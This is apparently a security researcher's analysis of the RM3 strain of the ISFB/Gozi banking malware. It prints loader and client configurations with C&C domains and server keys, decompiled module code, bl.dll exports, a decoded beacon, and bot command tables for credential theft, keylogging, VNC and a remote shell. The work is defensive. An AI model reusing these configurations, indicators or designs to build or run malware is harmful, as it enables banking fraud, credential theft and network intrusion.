    "URI": "index.htm",
    "GROUP": "3000",
    "SERVER": "350",
    "SERVERKEY": "s2olwVg5cU7fWsec",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "10",
    "HOSTKEEPTIMEOUT": "60",
    "DGATEMPLATE": "constitution.org/usdeclar.txt",
    "DGAZONES": [
        "com",
        "ru",
        "org"
    ],
    "DGATEMPHASH": "0x4eb7d2ca",
    "DGAPERIOD": "10"
}

As a reminder, the ISFB v2 variant called GoziAT (which technically uses the RM2 loader) uses the format shown below:

LOADER.INI - GoziAT/ISFB (RM2 Loader) 
{
    "HOSTS": [
        "api10.laptok.at/api1",
        "golang.feel500.at/api1",
        "go.in100k.at/api1"
    ],
    "GROUP": "1100",
    "SERVER": "730",
    "SERVERKEY": "F2oareSbPhCq2ch0",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "20",
    "HOSTSHIFTTIMEOUT": "1"
}

But this RM3 infrastructure disappeared just a few weeks later and has never been seen again. It is not known if the TAs were satisfied with the product and its results and it remains one of the unexplained curiosities of this banking malware

But, we can say this marked the return of GoziAT, which was back on track with intense campaigns.

Other domains related to this short lived RM3 infrastructure were.

  • api.fiho.at
  • y1.rexa.at
  • cde.frame303.at
  • api.frame303.at
  • u2.inmax.at
  • cdn5.inmax.at
  • go.maso.at
  • f1.maso.at

Standard routine for other infrastructures

Meanwhile, a classic loader config will mostly need standard data like any other malware:

  • C&C domains (called hosts on the loader side)
  • Timeout values
  • Keys

The example below shows a typical loader.ini file from a more ‘classic’ infrastructure. This one is from Germany, but similar configurations were seen in the UK1, Australia/New Zealand1 and Italian infrastructures:

LOADER.INI – DE 
{
    "HOSTS": "https://daycareforyou.xyz",
    "ADNSONLY": "0",
    "URI": "index.htm",
    "GROUP": "40000",
    "SERVER": "12",
    "SERVERKEY": "z2Ptfc0edLyV4Qxo",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "10",
    "HOSTKEEPTIMEOUT": "60",
    "DGATEMPLATE": "constitution.org/usdeclar.txt",
    "DGAZONES": [
        "com",
        "ru",
        "org"
    ],
    "DGATEMPHASH": "0x4eb7d2ca",
    "DGAPERIOD": "10"
}

Updates to RM3 were observed to be ongoing, and more fields have appeared since the 3009XX builds (e.g: 300912, 900932):

  • Configuring the self-removing process
  • Setup the loader module as the persistent one
  • The Anti-CIS (langid field) is also making a comeback

The example below shows a typical client.ini file as seen in build 3009xx from the UK2 and Australia/New Zealand 2 infrastructures:

CLIENT.INI 
{
    "HOSTS": "https://vilecorbeanca.xyz",
    "ADNSONLY": "0",
    "URI": "index.htm",
    "GROUP": "92020291",
    "SERVER": "12",
    "SERVERKEY": "kD9eVTdi6lgpH0Ml",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "10",
    "HOSTKEEPTIMEOUT": "60",
    "NOSCRIPT": "0",
    "NODELETE": "0",
    "NOPERSISTLOADER": "0",
    "LANGID": "RU",
    "DGATEMPLATE": "constitution.org/usdeclar.txt",
    "DGATEMPHASH": "0x4eb7d2ca",
    "DGAZONES": [
        "com",
        "ru",
        "org"
    ],
    "DGAPERIOD": "10"
}

The client.ini file mainly stores elements that will be required for the explorer.dll module:

  • Timeouts values
  • Maximum size allowed for RM3 requests to the controllers
  • Video config
  • HTTP proxy activation
CLIENT.INI - Default Format
{
    "CONTROLLER": [
        "",
    ],
    "ADNSONLY": "0",
    "IPRESOLVERS": "curlmyip.net",
    "SERVER": "12",
    "SERVERKEY": "",
    "IDLEPERIOD": "300",
    "TASKTIMEOUT": "300",
    "CONFIGTIMEOUT": "300",
    "INITIMEOUT": "300",
    "SENDTIMEOUT": "300",
    "GROUP": "",
    "HOSTKEEPTIMEOUT": "60",
    "HOSTSHIFTTIMEOUT": "60",
    "RUNCHECKTIMEOUT": "10",
    "REMOVECSP": "0",
    "LOGHTTP": "0",
    "CLEARCACHE": "1",
    "CACHECONTROL": [
        "no-cache,",
        "no-store,",
        "must-revalidate"
    ],
    "MAXPOSTLENGTH": "300000",
    "SETVIDEO": [
        "30,",
        "8,",
        "notipda"
    ],
    "HTTPCONNECTTIME": "480",
    "HTTPSENDTIME": "240",
    "HTTPRECEIVETIME": "240"
}

What next?

Active monitoring of current in-the-wild instances suggests that the RM3 TAs are progressively switching to the ransomware path. That is, they have not pushed any updates on the fraud side of their operations for a number of months (by not pushing any injects), but they are still maintaining their C&C infrastructure. All infrastructure has a cost and the fact they are maintaining their C&C infrastructure without executing traditional fraud is a strong indication they are changing their strategy to another source of income.

The tasks which are being pushed (and old ones since May 2020) are triage steps for selecting bots which could be used for internal lateral movement. This pattern of behaviour is becoming more evident everyday in the latest ongoing campaigns, where everyone seems to be targeted and the inject configurations have been totally removed.

As a reminder, over the past two years banking malware gangs in general have been seen to follow this trend. This is due to the declining fraud ecosystem in general, but also due to the increased difficulty in finding inject developers with the skills to develop effective fakes which this decline has also prompted.

How banking TAs can migrate from fraud to ransom (or any other businesses)

We consider RM3 to be the most advanced ISFB strain to date, and fraud tools can easily be switched into a malicious red team like strategy.

RM3 evolving to support two different use cases at the same time

Why is RM3 the most advanced ISFB strain?

As we said, we consider RM3 to be the most advanced ISFB variant we have seen. When we analyse the RM3 payload, there is a huge gap between it and its predecessors. There are multiple differences:

  • A new PE format called PX has been developed
  • The .bss section is slightly updated for storing RM3 static variables
  • A new structure called WD based on the J1/J2/J3/JJ ISFB File Join system for storing files
Architecture differences between ISFB v2 and RM3 payload
(main sections discussed below)

PX Format

As mentioned, RM3 is designed to work with PX payloads (Portable eXecutable). This is an exotic file format created for, and only used with, this banking malware. The structure is not very different from the original PE format, with almost all sections, data directories and section tables remaining intact. Essentially, use of the new file format just requires malware to be re-crafted correctly in a new payload at the correct offset.

PX Header

BSS section

The bss section (Block Starting Symbol) is a critical data segment used by all strains of ISFB for storing uninitiated static local variables. These variables are encrypted and used for different interactions depending on the module in use.

In a compiled payload, this section is usually named “.bss0”. But evidence from a source code leak shows that this is originally named “.bss” in the source code. These comments also make it clear that this module is encrypted.

The encrypted .bss section

This is illustrated by the source code comments shown below:

// Original section name that will be created within a file
#define CS_SECTION_NAME ".bss0"
// The section will be renamed after the encryption completes.
// This is because we cannot use reserved section names aka ".rdata" or ".bss" during compile time.
#define CS_NEW_SECTION_NAME ".bss"

When working with ISFB, it is common to see the same mechanism or routine across multiple compiled builds or variants. However, it is still necessary to analyse them all in detail because slight adjustments are frequently introduced. Understanding these minor changes can help with troubleshooting and explain why scripts don’t work. The decryption routine in the bss section is a perfect example of this; it is almost identical to ISFB v2 variants, but the RM3 developers decided to tweak it just slightly by creating an XOR key in a different way – adding a FILE_HEADER.TimeDateStamp with the gs_Cookie (this information based on the ISFB leak).

Decrypted strings from the .bss section being parsed by IDA

Occasionally, it is possible to see a debugged and compiled version of RM3 in the wild. It is unknown if this behaviour is intended for some reason or simply a mistake by TA teams, but it is a gold mine for understanding more about the underlying code.

WD Struct

ISFB has its own way of storing and using embedded files. It uses a homemade structure that seems to change its name whenever there is a new strain or a major ISFB update:

  • FJ or J1 – Old ISFB era
  • J2 – Dreambot
  • J3 – ISFB v3 (Only seen in Japan)
  • JJ – ISFB v2 (v2.14+ – now)
  • WD – RM3 / Saigon

To get a better understanding of the latest structure in use, it is worth taking a quick look back at the active strains of ISFB v2 still known to use the JJ system.

The structure is pretty rudimentary and can be summarised like this:

struct JJ_Struct {
 DWORD xor_cookie;
 DWORD crc32;
 DWORD size;
 DWORD addr;
} JJ;

With RM3, they decided to slightly rework the join file philosophy by creating a new structure called WD. This is basically just a rebranded concept; it just adds the JJ structure (seen above) and stores it as a pointer array.

The structure itself is really simple:

struct WD_Struct {
  DWORD size;
  WORD magic;
  WORD flag;
  JJ_Struct *jj;
} WD;

In allRM3 builds, these structures simply direct the malware to grab an average of at least 4 files†:

  • A PX loader
  • An RSA pubkey
  • An RM3 config
  • A wordlist that will be mainly used for create subkeys in the registry

† The amount of files is dependent on the loader stage or RM3 modules used. It is also based on the ISFB variant, as another file could be present which stores the langid value (which is basically the anti-cis feature for this banking malware).

Architecture

Every major ISFB variant has something that makes it unique in some way. For example, the notorious Dreambot was designed to work as a standalone payload; the whole loader stage walk-through was removed and bots were directly pointed at the correct controllers. This choice was mainly explained by the fact that this strain was designed to work as malware as a service. It is fairly standard right now to see malware developers developing specific features for TAs – if they are prepared to pay for them. In these agreements, TAs can be guaranteed some kind of exclusivity with a variant or feature. However, this business model does also increase the risk of misunderstanding and overlap in term of assigning ownership and responsibility. This is one of the reasons it is harder to get a clear picture of the activities happening between malware developers & TAs nowadays.

But to get back to the variant we are discussing here; RM3 pushed the ISFB modular plugin system to its maximum potential by introducing a range of elements into new modules that had never been seen before. These new modules included:

  • bl.dll
  • explorer.dll
  • rt.dll
  • netwrk.dll

These modules are linked together to recreate a modded client32.bin/client64.bin (modded from the client.bin seen in ISFB v2). This new architecture is much more complicated to debug or disassemble. In the end, however, we can split this malware into 4 main branches:

  • A modded client32.bin/client64.bin
  • A browser module designed to setup hooks and an SSL proxy (used for POST HTTP/HTTPS interception)
  • A remote shell (probably designed for initial assessments before starting lateral attacks)
  • A fraud arsenal toolkit (hidden VNC, SOCKs proxy, etc…)
RM3 Architecture

RM3 Loader –
Major ISFB update? Or just a refactored code?

The loader is a minimalist plugin that contains only the required functions for doing three main tasks:

  • Contacting a loader C&C (which is called host), downloading critical RM3 modules and storing them into the registry (bl.dll, explorer.dll, rt.dll, netwrk.dll)
  • Setting up persistence†
  • Rebooting everything and making sure it has removed itself†.
An overview of the second stage loader

These functions are summarised in the following schematic.‡

† In the 3009XX build above, a TA can decide to setup the loader as persistent itself, or remove the payload.

‡ Of course, the loader has more details than could be mentioned here, but the schematic shows the main concepts for a basic understanding.

RM3 Network beacons – Hiding the beast behind simple URIs

C&C beacon requests have been adjusted from the standard ISFB v2 ones, by simplifying the process with just two default URI. These URIs are dynamic fields that can be configured from the loader and client config. This is something that older strains are starting to follow since build 250172.

When it switches to the controller side, RM3 saves HTTPS POST requests performed by the users. These are then used to create fake but legitimate looking paths.

Changing RM3 URI path dynamically

This ingenious trick makes RM3 really hard to catch behind the telemetry generated by the bot. To make short, whenever the user is browsing websites performing those specific requests, the malware is mimicking them by replacing the domain with the controller one.

https://<controler_domain>.tld/index.html                <- default
https://<controler_domain>.tld/search/wp-content/app     <- timer cycle #1
https://<controler_domain>.tld/search/wp-content/app
https://<controler_domain>.tld/search/wp-content/app
https://<controler_domain>.tld/search/wp-content/app
https://<controler_domain>.tld/admin/credentials/home    <- timer cycle #2
https://<controler_domain>.tld/admin/credentials/home
https://<controler_domain>.tld/admin/credentials/home
https://<controler_domain>.tld/admin/credentials/home
https://<controler_domain>.tld/operating/static/template/index.php  <- timer cycle #3
https://<controler_domain>.tld/operating/static/template/index.php
https://<controler_domain>.tld/operating/static/template/index.php
https://<controler_domain>.tld/operating/static/template/index.php

If that wasn’t enough, the usual base64 beacons are now hidden as a data form and send by means of POST requests. When decrypted, these requests reveal this typical network communication.

random=rdm&type=1&soft=3&version=300960&user=17fe7d78280730e52b545792f07d61cb&group=21031&id=00000024&arc=0&crc=44c9058a&size=2&uptime=219&sysid=15ddce20c9691c1ff5103a921e59d7a1&os=10.0_0_0_x64 

The fields can be explained in as follows:

Field Meaning
randomA mandatory randomised value
typeData format
softNetwork communication method
versionBuild of the RM3 banking malware
userUser seed
groupCampaign ID
idRM3 Data type
arcModule with specific architecture (0 =  i386 – 1= 86_x64)
sizeStolen data size
uptimeBot uptime
sysidMachine seed
osWindows version

Soft – A curious ISFB Field

Value Stage C&C Network Communication Response Format
(< Build 300960)
Response Format
(Build 300960)
3Host (Loader)WinAPIBase64(RSA + Serpent)Base64(RSA + AES)
2Host (Loader)COMBase64(RSA + Serpent)Base64(RSA + AES)
1ControllerWinAPI/COMRSA + SerpentRSA + AES

ID – A field being updated RM3

Thanks to the source code leak, identifying the data type is not that complicated and can be determined from the field “id”

Бот отправляет на сервер файлы следующего типа и формата (тип данных задаётся параметром type в POST-запросе):
SEND_ID_UNKNOWN	0	- неизвестно, используется только для тестирования	
SEND_ID_FORM	1	- данные HTML-форм. ASCII-заголовок + форма бинарном виде, как есть
SEND_ID_FILE	2	- любой файл, так шлются найденные по маске файлы
SEND_ID_AUTH	3	- данные IE Basic Authentication, ASCII-заголовок + бинарные данные
SEND_ID_CERTS	4	- сертификаты. Файлы PFX упакованые в CAB или ZIP.
SEND_ID_COOKIES	5	- куки и SOL-файлы. Шлются со структурой каталогов. Упакованы в CAB или ZIP
SEND_ID_SYSINFO	6	- информация о системе. UTF8(16)-файл, упакованый в CAB или ZIP
SEND_ID_SCRSHOT	7	- скриншот. GIF-файл.
SEND_ID_LOG	8	- внутренний лог бота. TXT-файл.
SEND_ID_FTP	9	- инфа с грабера FTP. TXT-файл.
SEND_ID_IM	10	- инфа с грабера IM. TXT-файл.
SEND_ID_KEYLOG	11	- лог клавиатуры. TXT-файл.
SEND_ID_PAGE_REP 12	- нотификация о полной подмене страницы TXT-файл.
SEND_ID_GRAB	13	- сграбленый фрагмент контента. ASCII заголовок + контент, как он есть

Over time, they have created more fields:

New CommandIDDescription
SEND_ID_CMD19Results from the CMD_RUN command
SEND_ID_???20
SEND_ID_CRASH21Crash dump
SEND_ID_HTTP22Send HTTP Logs
SEND_ID_ACC23Send credentials
SEND_ID_ANTIVIRUS24Send Antivirus info

Module list

Analysis indicates that any RM3 instance would have to include at least the following modules:

CRCModule NamePE FormatStageDescription
MZ1st stage RM3 loader
0xc535d8bfloader.dllPX2nd stage RM3 loader
MZRM3 Startup module hidden in the shellcode
0x8576b0d0bl.dllPXHostRM3 Background Loader
0x224c6c42explorer.dllPXHostRM3 Mastermind
0xd6306e08rt.dllPXHostRM3 Runtime DLL – RM3 WinAPI/COM Module
0x45a0fcd0netwrk.dllPXHostRM3 Network API
0xe6954637browser.dllPXControllerBrowser Grabber/HTTPS Interception
0x5f92dac2iexplore.dllPXControllerInternet explorer Hooking module
0x309d98fffirefox.dllPXControllerFirefox Hooking module
0x309d98ffmicrosoftedgecp.dllPXControllerMicrosoft Edge Hooking module (old one)
0x9eff4536chrome.dllPXControllerGoogle chrome Hooking module
0x7b41e687msedge.dllPXControllerMicrosoft Edge Hooking module (Chromium one)
0x27ed1635keylog.dllPXControllerKeylogging module
0x6bb59728mail.dllPXControllerMail Grabber module
0x1c4f452avnc.dllPXControllerVNC module
0x970a7584sqlite.dllPXControllerSQLITE Library required for some module
0xfe9c154bftp.dllPXControllerFTP module
0xd9839650socks.dllPXControllerSocks module
0x1f8fde6bcmdshell.dllPXControllerPersistent remote shell module

Additionally, more configuration files ( .ini ) are used to store all the critical information implemented in RM3. Four different files are currently known:

CRC Name
0x8fb1dde1loader.ini
0x68c8691cexplorer.ini
0xd722afcbclient.ini†
0x68c8691cvnc.ini

† CLIENT.INI is never intended to be seen in an RM3 binary, as it is intended to be received by the loader C&C (aka “the host”, based on its field name on configs). This is completely different from older ISFB strains, where the client.ini is stored in the client32.bin/client64.bin. So it means, if the loader c&c is offline, there is no option to get this crucial file

Moving this file is a clever move by the RM3 malware developers and the TAs using it as they have reduced the risk of having researcher bots in their ecosystem.

RM3 dependency madness

With client32.bin (from the more standard ISFB v2 form) technically not present itself but instead implemented as an accumulation of modules injected into a process, RM3 is drastically different from its predecessors. It has totally changed its micro-ecosystem by forcing all of its modules to interact with each other (except bl.dll) and as shown below.

All interactions between RM3 modules

These changes also slow down any in-depth analysis, as they make it way harder to analyse as a standalone module.

External calls from other RM3 modules (8576b0d0 and e695437)

RM3 Module 101

Thanks to the startup module launched by start.ps1 in the registry, a hidden shell worker is plugged into explorer.exe (not the explorer.dll module) that initialises a hooking instance for specific WinAPI/COM calls. This allows the banking malware to inject all its components into every child process coming from that Windows process. This strategy permits RM3 to have total control of all user interactions.

(*) PoV = Point of View

Looking at DllMain, the code hasn’t changed that much in the years since the ISFB leak.

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  BOOL Ret = TRUE;
  WINERROR Status = NO_ERROR;

  Ret = 1;
  if ( ul_reason_for_call ) {
    if ( ul_reason_for_call == 1 && _InterlockedIncrement(&g_AttachCount) == 1 ) {
      Status = ModuleStartup(hModule, lpReserved); // <- Main call 
      if ( Status ) {
        SetLastError(Status);
        Ret = 0;
      }
    }
  }
  else if ( !_InterlockedExchangeAdd(&g_AttachCount, 0xFFFFFFFF) ) {
    ModuleCleanup();
  }
  return Ret;
}

It is only when we get to the ModuleStartup call that things start to become interesting. This code has been refactored and adjusted to the RM3 philosophy:

static WINERROR ModuleStartup(HMODULE hModule) {
    WINERROR Status; 
    RM3_Struct RM3;

    // Need mandatory RM3 Struct Variable, that contains everything
    // By calling an export function from BL.DLL
	RM3 = bl!GetRM3Struct();  

    // Decrypting the .bss section
    // CsDecryptSection is the supposed name based on ISFB leak
	Status = bl!CsDecryptSection(hModule, 0);
  
    if ( (gs_Cookie ^ RM3->dCrc32ExeName) == PROCESSNAMEHASH )
    	Status = Startup() 
	
    return(Status);
}

This adjustment is pretty similar in all modules and can be summarised as three main steps:

  • Requesting from bl.dll a critical global structure (called RM3_struct for the purpose of this article) which has the minimal requirements for running the injected code smoothly. The structure itself changes based on which module it is. For example, bl.dll mostly uses it for recreating values that seem to be part of the PEB (hypothesis); explorer.dll uses this structure for storing timeout values and browsers.dll uses it for RM3 injects configurations.
  • Decrypting the .bss section.
  • Entering into the checking routine by using an ingenious mechanism:
    • The filename of the child process is converted into a JamCRC32 hash and compared with the one stored in the startup function. If it matches, the module starts its worker routine, otherwise it quits.

These are a just a few particular cases, but the philosophy of the RM3 Module startup is well represented here. It is a simple and clever move for monitoring user interactions, because it has control over everything coming from explorer.exe.

bl.dll – The backbone of RM3

The background loader is almost nothing and everything at the same time. It’s the root of the whole RM3 infrastructure when it’s fully installed and configured by the initial loader. Its focus is mainly to initialise RM3_Struct and permits and provides a fundamental RM3 API to all other modules:

Ordinal    | Goal 
==========================================
856b0d0_1  | bl!GetBuild
856b0d0_2  | bl!GetRM3Struct
856b0d0_3  | bl!WaitForSingleObject
856b0d0_4  | bl!GenerateRNG
856b0d0_5  | bl!GenerateGUIDName
856b0d0_6  | bl!XorshiftStar
856b0d0_7  | bl!GenerateFieldName
856b0d0_8  | bl!GenerateCRC32Checksum
856b0d0_9  | bl!WaitForMultipleObjects
856b0d0_10 | bl!HeapAlloc
856b0d0_11 | bl!HeapFree
856b0d0_12 | bl!HeapReAlloc
856b0d0_13 | bl!???
856b0d0_14 | bl!Aplib
856b0d0_15 | bl!ReadSubKey 
856b0d0_16 | bl!WriteSubKey 
856b0d0_17 | bl!CreateProcessA
856b0d0_18 | bl!CreateProcessW
856b0d0_19 | bl!GetRM3MainSubkey
856b0d0_20 | bl!LoadModule
856b0d0_21 | bl!???
856b0d0_22 | bl!OpenProcess 
856b0d0_23 | bl!InjectDLL
856b0d0_24 | bl!ReturnInstructionPointer
856b0d0_25 | bl!GetPRNGValue
856b0d0_26 | bl!CheckRSA
856b0d0_27 | bl!Serpent
856b0d0_28 | bl!SearchConfigFile
856b0d0_29 | bl!???
856b0d0_30 | bl!ResolveFunction01
856b0d0_31 | bl!GetFunctionByIndex
856b0d0_32 | bl!HookFunction
856b0d0_33 | bl!???
856b0d0_34 | bl!ResolveFunction02
856b0d0_35 | bl!???
856b0d0_36 | bl!GetExplorerPID
856b0d0_37 | bl!PsSupSetWow64Redirection
856b0d0_40 | bl!MainRWFile
856b0d0_42 | bl!PipeSendCommand
856b0d0_43 | bl!PipeMainRWFile
856b0d0_44 | bl!WriteFile 
856b0d0_45 | bl!ReadFile
856b0d0_50 | bl!RebootBlModule
856b0d0_51 | bl!LdrFindEntryForAddress
856b0d0_52 | bl!???
856b0d0_55 | bl!SetEAXToZero
856b0d0_56 | bl!LdrRegisterDllNotification
856b0d0_57 | bl!LdrUnegisterDllNotification
856b0d0_59 | bl!FillGuidName
856b0d0_60 | bl!GenerateRandomSubkeyName
856b0d0_61 | bl!InjectDLLToSpecificPID
856b0d0_62 | bl!???
856b0d0_63 | bl!???
856b0d0_65 | bl!???
856b0d0_70 | bl!ReturnOne             
856b0d0_71 | bl!AppAlloc
856b0d0_72 | bl!AppFree
856b0d0_73 | bl!MemAlloc
856b0d0_74 | bl!MemFree
856b0d0_75 | bl!CsDecryptSection  (Decrypt bss, real name from isfb leak source code)
856b0d0_76 | bl!CreateThread
856b0d0_78 | bl!GrabDataFromRegistry
856b0d0_79 | bl!Purge
856b0d0_80 | bl!RSA

explorer.dll – the RM3 mastermind

Explorer.dll could be regarded as the opposite of the background loader. It is designed to manage all interactions of this banking malware, at any level:

  • Checking timeout timers that could lead to drastic changes in RM3 operations
  • Allowing and executing all tasks that RM3 is able to perform
  • Starting fundamental grabbing features
  • Download and update modules and configs
  • Launch modules
  • Modifying RM3 URIs dynamically
An overview of the RM3 explorer.dll module

In the task manager worker, the workaround looks like the following:

RM3 task manager implemented in explorer.dll

Interestingly, the RM3 developers abuse their own hash system (JAMCRC32) by shuffling hashes into very large amounts of conditions. By doing this, they create an ecosystem that is seemingly unique to each build. Because of this, it feels a major update has been performed on an RM3 module although technically it is just another anti-disassembly trick for greatly slowing down any in-depth analysis. On the other hand, this task manager is a gold mine for understanding how all the interactions between bots and the C&C are performed and how to filter them into multiple categories.

General command

General commands

CRC Command Description
0xdf43cd90CRASHGenerate and send a crash report
0x274323e2RESTARTRestart RM3
0xce54bcf5REBOOTReboot system

Recording

CRC Command Description
0x746ce763VIDEOStart desktop recording of the victim machine
0x8de92b0dSETVIDEOVIDEO pivot condition
0x54a7c26cSET_VIDEOPreparing desktop recording

Updates

CRC Command Description
0xb82d4140UPDATE_ALLForcing update for all module
0x4f278846LOAD_UPDATELoad & Execute and updated PX module

Tasks

CRC Command Description
0xaaa425c4USETASKKEYUse task.bin pubkey for decrypting upcoming tasks

Timeout settings

CRC Command Description
0x955879a6SENDTIMEOUTTimeout timer for receiving commands
0xd7a003c9CONFIGTIMEOUTTimeout timer for receiving inject config updates
0x7d30ee46INITIMEOUTTimeout timer for receiving INI config update
0x11271c7fIDLEPERIODTimeout timer for bot inactivity
0x584e5925HOSTSHIFTTIMEOUTTimeout timer for switching C&C domain list
0x9dd1ccafSTANDBYTIMEOUTTimeout timer for switching primary C&C’s to Stand by ones
0x9957591RUNCHECKTIMEOUTTimeout timer for checking & run RM3 autorun
0x31277bd5TASKTIMEOUTTimeout timer for receiving a task request

Clearing

CRC Command Description
0xe3289ecbCLEARCACHECLR_CACHE pivot condition
0xb9781fc7CLR_CACHEClear all browser cache
0xa23fff87CLR_LOGSClear all RM3 logs currently stored
0x213e71beDEL_CONFIGRemove requested RM3 inject config

HTTP

CRC Command Description
0x754c3c76LOGHTTPIntercept & log POST HTTP communication
0x6c451cb6REMOVECSPRemove CSP headers from HTTP
0x97da04deMAXPOSTLENGTHClear all RM3 logs currently stored

Process execution

CRC Command Description
0x73d425ffNEWPROCESSInitialising RM3 routine

Backup

CRC Command Description
0x5e822676STANDBYCase condition if primary servers are not responding for X minutes

Data gathering

CRC Command Description
0x864b1e44GET_CREDSCollect credentials
0xdf794b64GET_FILESCollect files (grabber module)
0x2a77637aGET_SYSINFOCollect system information data

Main tasks

CRC Command Description
0x3889242LOAD_CONFIGDownload and Load a requested config with specific arguments
0xdf794b64GET_FILESDownload a DLL from a specific URL and load it into explorer.exe
0xae30e778LOAD_EXEDownload an executable from a specific URL and load it
0xb204e7e0LOAD_INIDownload and load an INI file from a specific URL
0xea0f4d48LOAD_CMDLoad and Execute Shell module
0x6d1ef2c6LOAD_FTPLoad and Execute FTP module with specific arguments
0x336845f8LOAD_KEYLOGLoad and Execute keylog module with specific arguments
0xdb269b16LOAD_MODULELoad and Execute RM3 PX Module with specific arguments
0x1e84cd23LOAD_SOCKSLoad and Execute socks module with specific arguments
0x45abeab3LOAD_VNCLoad and Execute VNC module with specific arguments

Shell command

CRC Command Description
0xb88d3fdfRUN_CMDExecute specific command and send the output to the C&C

URI setup

CRC Command Description
0x9c3c1432SET_URIChange the URI path of the request

File storage

CRC Command Description
0xd8829500STORE_GRABSave grabber content into temporary file
0x250de123STORE_KEYLOGSave keylog content into temporary file
0x863ecf42STORE_MAILSave stolen mail credentials into temporary file
0x9b587bc4STORE_HTTPLOGSave stolen http interceptions into temporary file
0x36e4e464STORE_ACCSave stolen credentials into temporary file

Timeout system

With its timeout values stored into its rm3_struct, explorer.dll is able to manage every possible worker task launched and monitor them. Then, whenever one of the timers reaches the specified value, it can modify the behaviour of the malware (in most cases, avoiding unnecessary requests that could create noise and so increase the chances of detection).

COM Objects being inspected for possible timeout

Backup controllers

In the same way, explorer.dll also provides additional controllers which are called ‘stand by’ domains. The idea behind this is that, when principal controller C&Cs don’t respond, a module can automatically switch to this preset list. Those new domains are stored in explorer.ini.

{
    "STANDBY": "standbydns1.tld","standbydns2.tld"  
    "STANDBYTIMEOUT": "60"                   // Timeout in minutes
}

In the example above, if the primary domain C&Cs did not respond after one hour, the request would automatically switch to the standby C&Cs.

Desktop recording and RM3 – An ingenious way to check bots

Rarely mentioned in the wild but actively used by TAs, RM3 is also able to record bot interactions. The video setup is stored in the client.ini file, which the bot receives from the controller domain.

"SETVIDEO": [
        "30,",     // 30 seconds
        "8,",      // 8 Level quality (min:1 - max:10)
        "notipda"  // Process name list    
],

Behind “SETVIDEO”, only 3 values are required to setup video recording:

RM3 AVI recording setup

After being initialised, the task waits its turn to be launched. It can be triggered to work in multiple ways:

  • Detecting the use of specific keywords in a Windows process
  • Using RM3’s increased debugging telemetry to detect if something is crashing, either in the banking malware itself or in a deployed injects (although the ability to detect crashes in an inject is only hypothetical and has not been observed)
  • Recording user interactions with a bank account; the ability to record video is a relatively new but killer move on the part of the malware developers allowing them to check legitimate bots and get injects

The ability to record video depends only on “@VIDEO=” being cached by the browser module. It is not primarily seen at first glance when examining the config, but likely inside external injects parts.

@ ISFB Code leak
Вкладка Video - запись видео с экрана

Opcode = "VIDEO"
Url - задает шаблон URL страницы, для которой необходмо сделать запись видео с экрана
Target - (опционально) задает ключевое слово, при наличии которого в коде страницы будет сделана запись
Var - задаёт длительность записи в секундах
RM3 browser webinject module detecting if it needs to launch a recording session (or any other particular task).

RM3 and its remote shell module – a trump card for ransomware gangs

Banking malware having its own remote shell module changes the potential impact of infecting a corporate network drastically. This shell is completely custom to the malware and is specially designed. It is also significantly less detectable than other tools currently seen for starting lateral movement attacks due to its rarity. The combination of potentially much greater impact and lower detectability make this piece of code a trump card, particularly as they now look to migrate to a ransomware model.

Called cmdshell, this module isn’t exclusive to RM3 but has in fact, been part of ISFB since at least build v2.15. It has likely been of interest for TA groups in fields less focused on fraud since then. The inclusion of a remote shell obviously greatly increases the flexibility this malware family provides to its operators; but also, of course, makes it harder to ascertain the exact purpose of any one infection, or the motivation of its operators.

Cmdshell module being launched by the RM3 Task Manager

After being executed by the task command “LOAD_CMD”, the injected module installs a persistent remote shell which a TA can use to perform any kind of command they want.

RM3 cmdshell module creating the remote shell

As noted above, the inclusion of a shell gives great flexibility, but can certainly facilitate the work of at least two types of TA:

  • Fraudsters (if the VNC/SOCKS module isn’t working well, perhaps)
  • Malicious Red teams affiliated with ransomware gangs

It’s worth noting that this remote shell should not be confused with the RUN_CMD command. The RUN_CMD is used to instruct a bot to execute a simple command with the output saved and sent to the Controllers. It is also present as a simple condition:

RUN_CMD inside the RM3 Task Manager

Then following a standard I/O interaction:

Executing task in cmd console and saving results into an archive

But both RM3’s remote shell and the RUN_CMD can be an entry point for pushing other specialised tools like Cobalt Strike, Mimikatz or just simple PowerShell scripts. With this kind of flexibility, the main limitation on the impact of this malware is any given TA’s level of skill and their imagination.

Task.key – a new weapon in RM3’s encryption paranoia

Implemented sometime around Q2 2020, RM3 decided to add an additional layer of protection in its network communications by updating the RSA public key used to encrypt communications between bot and controller domains.

They designed a pivot condition (USETASKKEY) that decides which RSA.KEY and TASK.KEY will be used for decrypting the content from the C&C depending of the command/content received. We believed this choice has been developed for breaking researcher for emulating RM3 traffic.

Extra condition with USETASKKEY to avoid using the wrong RSA pubkey

RM3 – A banking malware designed to debug itself

As we’ve already noted, RM3 represents a significant step change from previous versions of ISFB. These changes extend from major architecture changes down to detailed functional changes and so can be expected to have involved considerable development and probably testing effort, as well. Whether or not the malware developers found the troubleshooting for the RM3 variant more difficult than previously, they also took the opportunity to include a troubleshooting feature. If RM3 experiences any issues, it is designed to dump the relevant process and send a report to the C&C. It’s expected that this would then be reported to the malware developers and so may explain why we now see new builds appearing in the wild rather faster than we have previously.

The task is initialised at the beginning of the explorer module startup with a simple workaround:

  • Address of the MiniDumpWritDump function from dbghelp.dll is stored
  • The path of the temporary dump file is stored in C://tmp/rm3.dmp
  • All these values are stored into a designed function and saved into the RM3 master struct
Crash dump being initialized and stored into the RM3 global structure

With everything now configured, RM3 is ready for two possible scenarios:

  • Voluntarily crashing itself with the command ‘CRASH’
  • Something goes wrong and so a specific classic error code triggers the function
RM3 executing the crash dump routine

Stolen Data – The (old) gold mine

Gathering interesting bots is a skill that most banking malware TAs have decent experience with after years of fraud. And nowadays, with the ransomware market exploding, this expertise probably also permits them to affiliate more easily with ransom crews (or even to have exclusivity in some cases).

In general, ISFB (v2 and v3) is a perfect playground as it can be used as a loader with more advanced telemetry than classic info-stealers. For example, Vidar, Taurus or Raccoon Stealer can’t compete at this level. This is because the way they are designed to work as a one-shot process (and be removed from the machine immediately afterwards) makes them much less competitive than the more advanced and flexible ISFB. Of course, in any given situation, this does not necessarily mean they are less important than banking malware. And we should keep in mind the fact that the Revil gang bought the source code for the Kpot stealer and it is likely this was so they could develop their own loader/stealer.

RM3 can be split into three main parts in terms of the grabber:

  • Files/folders
  • Browser credential harvesting
  • Mail
